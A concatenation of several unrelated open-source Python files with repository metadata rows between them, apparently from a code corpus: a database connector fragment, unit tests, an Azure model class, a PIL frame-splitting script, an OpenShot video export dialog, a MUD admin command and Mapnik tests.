FROM user_cons_columns constraint_cols
INNER JOIN user_constraints constraints
ON constraint_cols.constraint_name = constraints.constraint_name
LEFT OUTER JOIN show_foreign_key fk
ON constraint_cols.column_name = fk.columnname
WHERE constraints.table_name =UPPER('%s')"""
def columnsFromSchema(self, tableName, soClass):
colData = self.queryAll(self.GET_COLUMNS
% tableName)
results = []
keymap = {}
pkmap={}
fkData = self.queryAll(self.GET_PK_AND_FK% tableName)
for col, cons_type, refcol, reftable in fkData:
col_name= col.lower()
pkmap[col_name]=False
if cons_type == 'R':
keymap[col_name]=reftable.lower()
elif cons_type == 'P':
pkmap[col_name]=True
if len(pkmap) == 0:
raise PrimaryKeyNotFounded, tableName
for (field, nullAllowed, default, data_type, data_len,
data_scale) in colData:
# id is defined as primary key --> ok
# We let sqlobject raise error if the 'id' is used for another column
field_name = field.lower()
if (field_name == soClass.sqlmeta.idName) and pkmap[field_name]:
continue
colClass, kw = self.guessClass(data_type,data_len,data_scale)
kw['name'] = field_name
kw['dbName'] = field
if nullAllowed == 'Y' :
nullAllowed=False
else:
nullAllowed=True
kw['notNone'] = nullAllowed
if default is not None:
kw['default'] = default
if field_name in keymap:
kw['foreignKey'] = keymap[field_name]
results.append(colClass(**kw))
return results
_numericTypes=['INTEGER', 'INT','SMALLINT']
_dateTypes=['DATE','TIME','TIMESTAMP']
def guessClass(self, t, flength, fscale=None):
"""
An internal method that tries to figure out what Col subclass
is appropriate given whatever introspective information is
available -- both very database-specific.
"""
if t in self._numericTypes:
return col.IntCol, {}
# The type returned by the sapdb library for LONG is
# SapDB_LongReader To get the data call the read member with
# desired size (default =-1 means get all)
elif t.find('LONG') != -1:
return col.StringCol, {'length': flength,
'varchar': False}
elif t in self._dateTypes:
return col.DateTimeCol, {}
elif t == 'FIXED':
return CurrencyCol,{'size':flength,
'precision':fscale}
else:
return col.Col, {}
| mit | 4,959,189,039,843,539,000 | 34.036304 | 103 | 0.576335 | false |
dcolligan/server | tests/unit/test_datarepo.py | 4 | 2918 | """
Tests the datarepo module
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import tempfile
import unittest
import ga4gh.server.datarepo as datarepo
import ga4gh.server.exceptions as exceptions
prefix = "ga4gh_datarepo_test"
def makeTempFile():
return tempfile.mkstemp(prefix=prefix)
def makeTempDir():
return tempfile.mkdtemp(prefix=prefix)
class AbstractDataRepoTest(unittest.TestCase):
"""
Parent class for data repo tests
"""
def setUp(self):
_, self._repoPath = makeTempFile()
def tearDown(self):
os.unlink(self._repoPath)
class TestDataRepoVersion(AbstractDataRepoTest):
"""
Tests the repo schema version is written and read correctly
and throws an error when there is a version mismatch.
"""
def testRightVersion(self):
repo = datarepo.SqlDataRepository(self._repoPath)
repo.open(datarepo.MODE_WRITE)
repo.initialise()
anotherRepo = datarepo.SqlDataRepository(self._repoPath)
anotherRepo.open(datarepo.MODE_READ)
self.assertEquals(anotherRepo._schemaVersion, str(repo.version))
def testWrongVersion(self):
repo = datarepo.SqlDataRepository(self._repoPath)
repo.version = datarepo.SqlDataRepository.SchemaVersion(
"wrong.version")
repo.open(datarepo.MODE_WRITE)
repo.initialise()
anotherRepo = datarepo.SqlDataRepository(self._repoPath)
with self.assertRaises(
exceptions.RepoSchemaVersionMismatchException):
anotherRepo.open(datarepo.MODE_READ)
class TestBadDatabase(AbstractDataRepoTest):
"""
Tests that errors are thrown when an invalid database is used
"""
def testDbFileWithoutTables(self):
repo = datarepo.SqlDataRepository(self._repoPath)
with self.assertRaises(exceptions.RepoInvalidDatabaseException):
repo.open(datarepo.MODE_READ)
def testTextFile(self):
with open(self._repoPath, 'w') as textFile:
textFile.write('This is now a text file')
repo = datarepo.SqlDataRepository(self._repoPath)
with self.assertRaises(exceptions.RepoInvalidDatabaseException):
repo.open(datarepo.MODE_READ)
class TestBadDatabaseNoSetup(unittest.TestCase):
"""
Tests that errors are thrown when an invalid database is used
(does not use setup/teardown functions)
"""
def testDirectory(self):
repoPath = makeTempDir()
repo = datarepo.SqlDataRepository(repoPath)
with self.assertRaises(exceptions.RepoInvalidDatabaseException):
repo.open(datarepo.MODE_READ)
def testNonexistentFile(self):
repo = datarepo.SqlDataRepository("aFilePathThatDoesNotExist")
with self.assertRaises(exceptions.RepoNotFoundException):
repo.open(datarepo.MODE_READ)
| apache-2.0 | -7,094,235,138,709,637,000 | 30.042553 | 72 | 0.699109 | false |
SUSE/azure-sdk-for-python | unreleased/azure-mgmt-machinelearning/azure/mgmt/machinelearning/models/example_request.py | 5 | 1192 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ExampleRequest(Model):
"""Sample input data for the service's input(s).
:param inputs: Sample input data for the web service's input(s) given as
an input name to sample input values matrix map.
:type inputs: dict
:param global_parameters: Sample input data for the web service's global
parameters
:type global_parameters: dict
"""
_attribute_map = {
'inputs': {'key': 'inputs', 'type': '{list}'},
'global_parameters': {'key': 'globalParameters', 'type': '{object}'},
}
def __init__(self, inputs=None, global_parameters=None):
self.inputs = inputs
self.global_parameters = global_parameters
| mit | -6,103,612,022,085,685,000 | 35.121212 | 77 | 0.598993 | false |
samdowd/drumm-farm | drumm_env/bin/explode.py | 1 | 2465 | #!/home/sam/p/drumm-farm/drumm_env/bin/python
#
# The Python Imaging Library
# $Id$
#
# split an animation into a number of frame files
#
from __future__ import print_function
from PIL import Image
import os
import sys
class Interval(object):
def __init__(self, interval="0"):
self.setinterval(interval)
def setinterval(self, interval):
self.hilo = []
for s in interval.split(","):
if not s.strip():
continue
try:
v = int(s)
if v < 0:
lo, hi = 0, -v
else:
lo = hi = v
except ValueError:
i = s.find("-")
lo, hi = int(s[:i]), int(s[i+1:])
self.hilo.append((hi, lo))
if not self.hilo:
self.hilo = [(sys.maxsize, 0)]
def __getitem__(self, index):
for hi, lo in self.hilo:
if hi >= index >= lo:
return 1
return 0
# --------------------------------------------------------------------
# main program
html = 0
if sys.argv[1:2] == ["-h"]:
html = 1
del sys.argv[1]
if not sys.argv[2:]:
print()
print("Syntax: python explode.py infile template [range]")
print()
print("The template argument is used to construct the names of the")
print("individual frame files. The frames are numbered file001.ext,")
print("file002.ext, etc. You can insert %d to control the placement")
print("and syntax of the frame number.")
print()
print("The optional range argument specifies which frames to extract.")
print("You can give one or more ranges like 1-10, 5, -15 etc. If")
print("omitted, all frames are extracted.")
sys.exit(1)
infile = sys.argv[1]
outfile = sys.argv[2]
frames = Interval(",".join(sys.argv[3:]))
try:
# check if outfile contains a placeholder
outfile % 1
except TypeError:
file, ext = os.path.splitext(outfile)
outfile = file + "%03d" + ext
ix = 1
im = Image.open(infile)
if html:
file, ext = os.path.splitext(outfile)
html = open(file+".html", "w")
html.write("<html>\n<body>\n")
while True:
if frames[ix]:
im.save(outfile % ix)
print(outfile % ix)
if html:
html.write("<img src='%s'><br>\n" % outfile % ix)
try:
im.seek(ix)
except EOFError:
break
ix += 1
if html:
html.write("</body>\n</html>\n")
| mit | 8,341,897,567,367,451,000 | 21.008929 | 75 | 0.532657 | false |
zaenalarifin/openshot_jmd | openshot/windows/ExportVideo.py | 1 | 22341 | # OpenShot Video Editor is a program that creates, modifies, and edits video files.
# Copyright (C) 2009 Jonathan Thomas
#
# This file is part of OpenShot Video Editor (http://launchpad.net/openshot/).
#
# OpenShot Video Editor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenShot Video Editor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with OpenShot Video Editor. If not, see <http://www.gnu.org/licenses/>.
has_py_notify = False
try:
import pynotify
has_py_notify = True
except:
has_py_notify = False
import os
import gtk, gtk.glade
import xml.dom.minidom as xml
import locale
from classes import messagebox, profiles, project, video
from windows.SimpleGladeApp import SimpleGladeApp
# init the foreign language
from language import Language_Init
class frmExportVideo(SimpleGladeApp):
def __init__(self, path="ExportVideo.glade", root="frmExportVideo", domain="OpenShot", form=None, project=None, **kwargs):
SimpleGladeApp.__init__(self, os.path.join(project.GLADE_DIR, path), root, domain, **kwargs)
# Add language support
_ = Language_Init.Translator(project).lang.gettext
self._ = _
self.form = form
self.project = project
self.frmExportVideo.show_all()
self.invalid_codecs = []
# init the project type properties
self.init_properties(self.cmbProjectType.get_active_text())
# set the export file name
self.txtFileName.set_text(self.project.name)
# set the export folder as the project folder (if any)
if ".openshot" in self.project.folder:
# This is the openshot default project (set the folder to 'DESKTOP')
self.fileExportFolder.set_current_folder(self.project.DESKTOP)
else:
# Set project folder
self.fileExportFolder.set_current_folder(self.project.folder)
# init the list of possible project types / profiles
self.profile_list = profiles.mlt_profiles(self.project).get_profile_list()
# loop through each profile, and add it to the dropdown
for file_name, p in self.profile_list:
# append profile to list
self.cmbProjectType.append_text(p.description())
export_options = [_("Video & Audio"), _("Image Sequence")]
# loop through export to options
for option in export_options:
# append profile to list
self.cboExportTo.append_text(option)
#populate the format/codec drop downs
#formats
format_model = self.cboVIdeoFormat.get_model()
format_model.clear()
for format in self.form.vformats:
self.cboVIdeoFormat.append_text(format)
#video codecs
vcodecs_model = self.cboVideoCodec.get_model()
vcodecs_model.clear()
for vcodec in self.form.vcodecs:
self.cboVideoCodec.append_text(vcodec)
#audio codecs
acodecs_model = self.cboAudioCodec.get_model()
acodecs_model.clear()
for acodec in self.form.acodecs:
self.cboAudioCodec.append_text(acodec)
# set the dropdown boxes
self.set_project_type_dropdown()
self.set_export_to_dropdown()
#load the simple project type dropdown
presets = []
for file in os.listdir(self.project.EXPORT_PRESETS_DIR):
xmldoc = xml.parse(os.path.join(self.project.EXPORT_PRESETS_DIR,file))
type = xmldoc.getElementsByTagName("type")
presets.append(_(type[0].childNodes[0].data))
#exclude duplicates
presets = list(set(presets))
for item in sorted(presets):
self.cboSimpleProjectType.append_text(item)
#indicate that exporting cancelled
self.cancelled = False
def set_project_type_dropdown(self):
# get reference to gettext
_ = self._
# get the model and iterator of the project type dropdown box
model = self.cmbProjectType.get_model()
iter = model.get_iter_first()
while True:
# get the value of each item in the dropdown
value = model.get_value(iter, 0)
# check for the matching project type
if self.project.project_type == value:
# set the item as active
self.cmbProjectType.set_active_iter(iter)
# get the next item in the list
iter = model.iter_next(iter)
# break loop when no more dropdown items are found
if iter is None:
break
def on_expander_activate(self, widget, *args):
#print "on_expander_activate"
#self.frmExportVideo.set_size_request(0,0)
pass
def set_selection_dropdown(self):
# get reference to gettext
_ = self._
# get the model and iterator of the project type dropdown box
model = self.cboSelection.get_model()
iter = model.get_iter_first()
# set the item as active
self.cboSelection.set_active_iter(iter)
def set_export_to_dropdown(self):
# get reference to gettext
_ = self._
# get the model and iterator of the project type dropdown box
model = self.cboExportTo.get_model()
iter = model.get_iter_first()
# set the item as active
self.cboExportTo.set_active_iter(iter)
def on_cboSimpleProjectType_changed(self, widget, *args):
#set the target dropdown based on the selected project type
#first clear the combo
self.cboSimpleTarget.get_model().clear()
# get reference to gettext
_ = self._
#parse the xml files and get targets that match the project type
selected_project = self.cboSimpleProjectType.get_active_text()
project_types = []
for file in os.listdir(self.project.EXPORT_PRESETS_DIR):
xmldoc = xml.parse(os.path.join(self.project.EXPORT_PRESETS_DIR,file))
type = xmldoc.getElementsByTagName("type")
if _(type[0].childNodes[0].data) == selected_project:
titles = xmldoc.getElementsByTagName("title")
for title in titles:
project_types.append(_(title.childNodes[0].data))
for item in sorted(project_types):
self.cboSimpleTarget.append_text(item)
if selected_project == _("All Formats"):
# default to MP4 for this type
self.set_dropdown_values(_("OGG (theora/vorbis)"), self.cboSimpleTarget)
else:
# choose first taret
self.cboSimpleTarget.set_active(0)
def on_cboSimpleTarget_changed(self, widget, *args):
#set the profiles dropdown based on the selected target
# get reference to gettext
_ = self._
self.cboSimpleVideoProfile.get_model().clear()
self.cboSimpleQuality.get_model().clear()
#don't do anything if the combo has been cleared
if self.cboSimpleTarget.get_active_text():
selected_target = self.cboSimpleTarget.get_active_text()
profiles_list = []
#parse the xml to return suggested profiles
for file in os.listdir(self.project.EXPORT_PRESETS_DIR):
xmldoc = xml.parse(os.path.join(self.project.EXPORT_PRESETS_DIR,file))
title = xmldoc.getElementsByTagName("title")
if _(title[0].childNodes[0].data) == selected_target:
profiles = xmldoc.getElementsByTagName("projectprofile")
#get the basic profile
if profiles:
# if profiles are defined, show them
for profile in profiles:
profiles_list.append(_(profile.childNodes[0].data))
else:
# show all profiles
for profile_node in self.profile_list:
profiles_list.append(_(profile_node[0]))
#get the video bit rate(s)
videobitrate = xmldoc.getElementsByTagName("videobitrate")
for rate in videobitrate:
v_l = rate.attributes["low"].value
v_m = rate.attributes["med"].value
v_h = rate.attributes["high"].value
self.vbr = {_("Low"): v_l, _("Med"): v_m, _("High"): v_h}
#get the audio bit rates
audiobitrate = xmldoc.getElementsByTagName("audiobitrate")
for audiorate in audiobitrate:
a_l = audiorate.attributes["low"].value
a_m = audiorate.attributes["med"].value
a_h = audiorate.attributes["high"].value
self.abr = {_("Low"): a_l, _("Med"): a_m, _("High"): a_h}
#get the remaining values
vf = xmldoc.getElementsByTagName("videoformat")
self.videoformat = vf[0].childNodes[0].data
vc = xmldoc.getElementsByTagName("videocodec")
self.videocodec = vc[0].childNodes[0].data
ac = xmldoc.getElementsByTagName("audiocodec")
self.audiocodec = ac[0].childNodes[0].data
sr = xmldoc.getElementsByTagName("samplerate")
self.samplerate = sr[0].childNodes[0].data
c = xmldoc.getElementsByTagName("audiochannels")
self.audiochannels = c[0].childNodes[0].data
# init the profiles combo
for item in sorted(profiles_list):
self.cboSimpleVideoProfile.append_text(item)
# choose the default project type / profile (if it's listed)
#self.set_dropdown_values(self.project.project_type, self.cboSimpleVideoProfile)
#set the quality combo
#only populate with quality settings that exist
if v_l or a_l:
self.cboSimpleQuality.append_text(_("Low"))
if v_m or a_m:
self.cboSimpleQuality.append_text(_("Med"))
if v_h or a_h:
self.cboSimpleQuality.append_text(_("High"))
def on_cboSimpleVideoProfile_changed(self, widget, *args):
# get reference to gettext
_ = self._
#don't do anything if the combo has been cleared
if self.cboSimpleVideoProfile.get_active_text():
profile = str(self.cboSimpleVideoProfile.get_active_text())
#does this profile exist?
p = profiles.mlt_profiles(self.project).get_profile(profile)
if str(p.description()) != profile:
messagebox.show(_("Error!"), _("%s is not a valid OpenShot profile. Profile settings will not be applied." % profile))
self.init_properties(profile)
#set the value of the project type dropdown on the advanced tab
self.set_dropdown_values(profile,self.cmbProjectType)
def on_cboSimpleQuality_changed(self, widget, *args):
# get reference to gettext
_ = self._
#don't do anything if the combo has been cleared
if self.cboSimpleQuality.get_active_text():
# reset the invalid codecs list
self.invalid_codecs = []
# Get the quality
quality = str(self.cboSimpleQuality.get_active_text())
#set the attributes in the advanced tab
#video format
self.set_dropdown_values(self.videoformat, self.cboVIdeoFormat)
#videocodec
self.set_dropdown_values(self.videocodec, self.cboVideoCodec)
#audiocode
self.set_dropdown_values(self.audiocodec, self.cboAudioCodec)
#samplerate
self.set_dropdown_values(self.samplerate, self.cboSampleRate)
#audiochannels
self.set_dropdown_values(self.audiochannels, self.cboChannels)
#video bit rate
self.cboBitRate.insert_text(0,self.vbr[quality])
self.cboBitRate.set_active(0)
#audio bit rate
self.cboAudioBitRate.insert_text(0,self.abr[quality])
self.cboAudioBitRate.set_active(0)
#check for any invalid codecs and disable
#the export button if required.
if self.invalid_codecs:
missing_codecs = ""
for codec in self.invalid_codecs:
missing_codecs += codec + "\n"
messagebox.show(_("Openshot Error"), _("The following formats/codecs are missing from your system:" + "\n\n" + "%s" % missing_codecs + "\nYou will not be able to use the selected export profile. You will need to install the missing formats/codecs or choose a different export profile."))
self.btnExportVideo.set_sensitive(False)
def set_dropdown_values(self, value_to_set, combobox):
# get reference to gettext
_ = self._
model = combobox.get_model()
iter = model.get_iter_first()
while True:
# get the value of each item in the dropdown
value = model.get_value(iter, 0)
# check for the matching value
if value_to_set == value:
# set the item as active
combobox.set_active_iter(iter)
break
# get the next item in the list
iter = model.iter_next(iter)
# break loop when no more dropdown items are found
if iter is None and value_to_set not in self.invalid_codecs:
self.invalid_codecs.append(value_to_set)
break
def init_properties(self, profile):
# get correct gettext method
_ = self._
# get the mlt profile
localType = profile
p = profiles.mlt_profiles(self.project).get_profile(localType)
# populate the labels with values
self.lblHeightValue.set_text(str(p.height()))
self.lblWidthValue.set_text(str(p.width()))
self.lblAspectRatioValue.set_text("%s:%s" % (p.display_aspect_num(), p.display_aspect_den()))
self.lblFrameRateValue.set_text("%.2f" % float(p.fps()))
self.lblPixelRatioValue.set_text("%s:%s" % (p.sample_aspect_num(), p.sample_aspect_den()))
if p.progressive():
self.lblProgressiveValue.set_text(_("Yes"))
else:
self.lblProgressiveValue.set_text(_("No"))
def on_frmExportVideo_close(self, widget, *args):
print "on_frmExportVideo_close"
def on_frmExportVideo_destroy(self, widget, *args):
print "on_frmExportVideo_destroy"
self.cancelled = True
# stop the export (if in-progress)
if self.project.form.MyVideo:
self.project.form.MyVideo.c.stop()
# mark project as modified
self.project.set_project_modified(is_modified=False, refresh_xml=True)
def on_cboExportTo_changed(self, widget, *args):
print "on_cboExportTo_changed"
# get correct gettext method
_ = self._
# get the "export to" variable
localcboExportTo = self.cboExportTo.get_active_text()
localtxtFileName = str.strip(self.txtFileName.get_text())
localtxtFileName = localtxtFileName.replace("_%d", "")
if localcboExportTo == _("Image Sequence"):
self.expander3.set_expanded(True) # image sequence
self.expander4.set_expanded(False) # video settings
self.expander5.set_expanded(False) # audio settings
# update filename
self.txtFileName.set_text(localtxtFileName + "_%d")
elif localcboExportTo == _("Video & Audio"):
self.expander3.set_expanded(False) # image sequence
self.expander4.set_expanded(True) # video settings
self.expander5.set_expanded(True) # audio settings
# update filename
self.txtFileName.set_text(localtxtFileName)
def on_cboProjectType_changed(self, widget, *args):
print "on_cboProjectType_changed"
# init the project type properties
self.init_properties(self.cmbProjectType.get_active_text())
def on_btnCancel_clicked(self, widget, *args):
print "on_btnCancel_clicked"
self.cancelled=True
self.frmExportVideo.destroy()
def on_btnExportVideo_clicked(self, widget, *args):
print "on_btnExportVideo_clicked"
# get correct gettext method
_ = self._
# Get general settings
localcboExportTo = self.cboExportTo.get_active_text()
localfileExportFolder = str.strip(self.fileExportFolder.get_filename())
localtxtFileName = str.strip(self.txtFileName.get_text())
# get project type
localcmbProjectType = self.cmbProjectType.get_active_text()
# get Image Sequence settings
localtxtImageFormat = str.strip(self.txtImageFormat.get_text())
# get video settings
localtxtVideoFormat = self.cboVIdeoFormat.get_active_text()
localtxtVideoCodec = self.cboVideoCodec.get_active_text()
localtxtBitRate = str.strip(self.txtBitRate.get_text())
BitRateBytes = self.convert_to_bytes(localtxtBitRate)
# get audio settings
localtxtAudioCodec = self.cboAudioCodec.get_active_text()
localtxtSampleRate = str.strip(self.txtSampleRate.get_text())
localtxtChannels = str.strip(self.txtChannels.get_text())
localtxtAudioBitRate = str.strip(self.txtAudioBitRate.get_text())
AudioBitRateBytes = self.convert_to_bytes(localtxtAudioBitRate)
# Validate the the form is valid
if (len(localtxtFileName) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid File Name."))
elif self.notebook1.get_current_page() == 0 and self.cboSimpleProjectType.get_active_iter() == None:
# Show error message
messagebox.show(_("Validation Error!"), _("Please select a valid Project Type."))
elif self.notebook1.get_current_page() == 0 and self.cboSimpleTarget.get_active_iter() == None:
# Show error message
messagebox.show(_("Validation Error!"), _("Please select a valid Target."))
elif self.notebook1.get_current_page() == 0 and self.cboSimpleVideoProfile.get_active_iter() == None:
# Show error message
messagebox.show(_("Validation Error!"), _("Please select a valid Profile."))
elif self.notebook1.get_current_page() == 0 and self.cboSimpleQuality.get_active_iter() == None:
# Show error message
messagebox.show(_("Validation Error!"), _("Please select a valid Quality."))
elif (len(localtxtImageFormat) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Image Format."))
elif (len(localtxtVideoFormat) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Video Format."))
elif (len(localtxtVideoCodec) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Video Codec."))
elif (len(BitRateBytes) == 0 or BitRateBytes == "0"):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Bit Rate."))
elif (len(localtxtAudioCodec) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Audio Codec."))
elif (len(localtxtSampleRate) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Sample Rate."))
elif (len(localtxtChannels) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Audio Channels."))
elif (len(AudioBitRateBytes) == 0 or AudioBitRateBytes == "0"):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Audio Bit Rate."))
else:
# VALID FORM
# update the project's profile
self.project.project_type = localcmbProjectType
# Refresh the MLT XML file
self.project.RefreshXML()
# create dictionary of all options
self.render_options = {}
self.render_options["folder"] = localfileExportFolder
self.render_options["file"] = localtxtFileName
self.render_options["export_to"] = localcboExportTo
if localcboExportTo == _("Image Sequence"):
self.render_options["vcodec"] = localtxtImageFormat
self.render_options["f"] = localtxtImageFormat
elif localcboExportTo == _("Video & Audio"):
self.render_options["vcodec"] = localtxtVideoCodec
self.render_options["f"] = localtxtVideoFormat
self.render_options["b"] = BitRateBytes
self.render_options["acodec"] = localtxtAudioCodec
self.render_options["ar"] = localtxtSampleRate
self.render_options["ac"] = localtxtChannels
self.render_options["ab"] = AudioBitRateBytes
# get the complete path to the new file
folder1 = self.render_options["folder"]
file1 = self.render_options["file"]
self.export_path = "%s.%s" % (os.path.join(folder1, file1), self.render_options["f"])
#check for existing filename before export and confirm overwrite
if os.path.exists(self.export_path):
messagebox.show(_("Confirm Overwrite"), _("There is already a video file named %s.%s in the selected export folder. Would you like to overwrite it?") % (file1, self.render_options["f"]), gtk.BUTTONS_YES_NO, self.confirm_overwrite_yes)
else:
# no existing file, so export now
self.do_export()
def do_export(self):
render_options = self.render_options
# flag that an export is in-progress
self.export_in_progress = True
# set window as MODAL (so they can't mess up the export)
self.frmExportVideo.set_modal(True)
# re-load the xml
self.project.form.MyVideo.set_profile(self.project.project_type, load_xml=False)
self.project.form.MyVideo.set_project(self.project, self.project.form, os.path.join(self.project.USER_DIR, "sequence.mlt"), mode="render", render_options=render_options)
self.project.form.MyVideo.load_xml()
def confirm_overwrite_yes(self):
#user agrees to overwrite the file
self.do_export()
def update_progress(self, new_percentage):
# get correct gettext method
_ = self._
# update the percentage complete
self.progressExportVideo.set_fraction(new_percentage)
# if progress bar is 100%, close window
if new_percentage == 1 and self.export_in_progress:
# remove the MODAL property from the window (sicne we are done)
self.frmExportVideo.set_modal(False)
if not self.cancelled:
title = _("Export Complete")
message = _("The video has been successfully exported to\n%s") % self.export_path
# prompt user that export is completed
if has_py_notify:
# Use libnotify to show the message (if possible)
if pynotify.init("OpenShot Video Editor"):
n = pynotify.Notification(title, message)
n.show()
else:
# use a GTK messagebox
messagebox.show(title, message)
# flag export as completed
self.export_in_progress = False
# close the window
#self.frmExportVideo.destroy()
def convert_to_bytes(self, BitRateString):
bit_rate_bytes = 0
# split the string into pieces
s = BitRateString.lower().split(" ")
measurement = "kb"
try:
# Get Bit Rate
if len(s) >= 2:
raw_number_string = s[0]
raw_measurement = s[1]
# convert string number to float (based on locale settings)
raw_number = locale.atof(raw_number_string)
if "kb" in raw_measurement:
measurement = "kb"
bit_rate_bytes = raw_number * 1000.0
elif "mb" in raw_measurement:
measurement = "mb"
bit_rate_bytes = raw_number * 1000.0 * 1000.0
except:
pass
# return the bit rate in bytes
return str(int(bit_rate_bytes))
def on_cboVIdeoFormat_changed(self, widget, *args):
self.btnExportVideo.set_sensitive(True)
def on_cboVideoCodec_changed(self, widget, *args):
self.btnExportVideo.set_sensitive(True)
def on_cboAudioCodec_changed(self, widget, *args):
self.btnExportVideo.set_sensitive(True)
def main():
frmExportVideo1 = frmExportVideo()
frmExportVideo1.run()
if __name__ == "__main__":
main()
| gpl-3.0 | 3,901,255,048,601,620,000 | 30.961373 | 292 | 0.695806 | false |
vlegoff/tsunami | src/primaires/scripting/commandes/scripting/alerte_rebase.py | 1 | 2791 | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Module contenant la commande 'scripting alerte rebase'."""
from primaires.interpreteur.masque.parametre import Parametre
class PrmRebase(Parametre):
"""Commande 'scripting alerte rebase'"""
def __init__(self):
"""Constructeur du paramètre."""
Parametre.__init__(self, "rebase", "rebase")
self.nom_groupe = "administrateur"
self.aide_courte = "re-numérote les alertes"
self.aide_longue = \
"Cette commande permet de réordonner les alertes en les " \
"numérotant proprement de 1 à N. Ceci est souvent un " \
"plus si le nombre d'alertes commence à devenir important " \
"et leur ID est trop élevé."
def interpreter(self, personnage, dic_masques):
"""Méthode d'interprétation de commande"""
alertes = sorted(list(importeur.scripting.alertes.values()),
key=lambda a: a.no)
for i, alerte in enumerate(alertes):
del importeur.scripting.alertes[alerte.no]
alerte.no = i + 1
importeur.scripting.alertes[i + 1] = alerte
type(alerte).no_actuel = len(alertes)
personnage << "{} alertes renumérotées.".format(len(alertes))
| bsd-3-clause | -8,156,610,740,187,534,000 | 45.316667 | 79 | 0.712487 | false |
ake-koomsin/mapnik_nvpr | tests/python_tests/ogr_test.py | 1 | 2621 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from nose.tools import *
from utilities import execution_path
import os, mapnik
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
if 'ogr' in mapnik.DatasourceCache.plugin_names():
# Shapefile initialization
def test_shapefile_init():
s = mapnik.Ogr(file='../../demo/data/boundaries.shp',layer_by_index=0)
e = s.envelope()
assert_almost_equal(e.minx, -11121.6896651, places=7)
assert_almost_equal(e.miny, -724724.216526, places=6)
assert_almost_equal(e.maxx, 2463000.67866, places=5)
assert_almost_equal(e.maxy, 1649661.267, places=3)
# Shapefile properties
def test_shapefile_properties():
# NOTE: encoding is latin1 but gdal >= 1.9 should now expose utf8 encoded features
# See SHAPE_ENCODING for overriding: http://gdal.org/ogr/drv_shapefile.html
# So: failure for the NOM_FR field is expected for older gdal
ds = mapnik.Ogr(file='../../demo/data/boundaries.shp',layer_by_index=0)
f = ds.features_at_point(ds.envelope().center()).features[0]
eq_(ds.geometry_type(),mapnik.DataGeometryType.Polygon)
eq_(f['CGNS_FID'], u'6f733341ba2011d892e2080020a0f4c9')
eq_(f['COUNTRY'], u'CAN')
eq_(f['F_CODE'], u'FA001')
eq_(f['NAME_EN'], u'Quebec')
# this seems to break if icu data linking is not working
eq_(f['NOM_FR'], u'Qu\xe9bec')
eq_(f['NOM_FR'], u'Québec')
eq_(f['Shape_Area'], 1512185733150.0)
eq_(f['Shape_Leng'], 19218883.724300001)
@raises(RuntimeError)
def test_that_nonexistant_query_field_throws(**kwargs):
ds = mapnik.Ogr(file='../data/shp/world_merc.shp',layer_by_index=0)
eq_(len(ds.fields()),11)
eq_(ds.fields(),['FIPS', 'ISO2', 'ISO3', 'UN', 'NAME', 'AREA', 'POP2005', 'REGION', 'SUBREGION', 'LON', 'LAT'])
eq_(ds.field_types(),['str', 'str', 'str', 'int', 'str', 'int', 'int', 'int', 'int', 'float', 'float'])
query = mapnik.Query(ds.envelope())
for fld in ds.fields():
query.add_property_name(fld)
# also add an invalid one, triggering throw
query.add_property_name('bogus')
fs = ds.features(query)
def test_handling_of_null_features():
ds = mapnik.Ogr(file='../data/json/null_feature.json',layer_by_index=0)
fs = ds.all_features()
eq_(len(fs),1)
if __name__ == "__main__":
setup()
[eval(run)() for run in dir() if 'test_' in run]
| lgpl-2.1 | -137,470,692,475,225,730 | 38.69697 | 119 | 0.606107 | false |
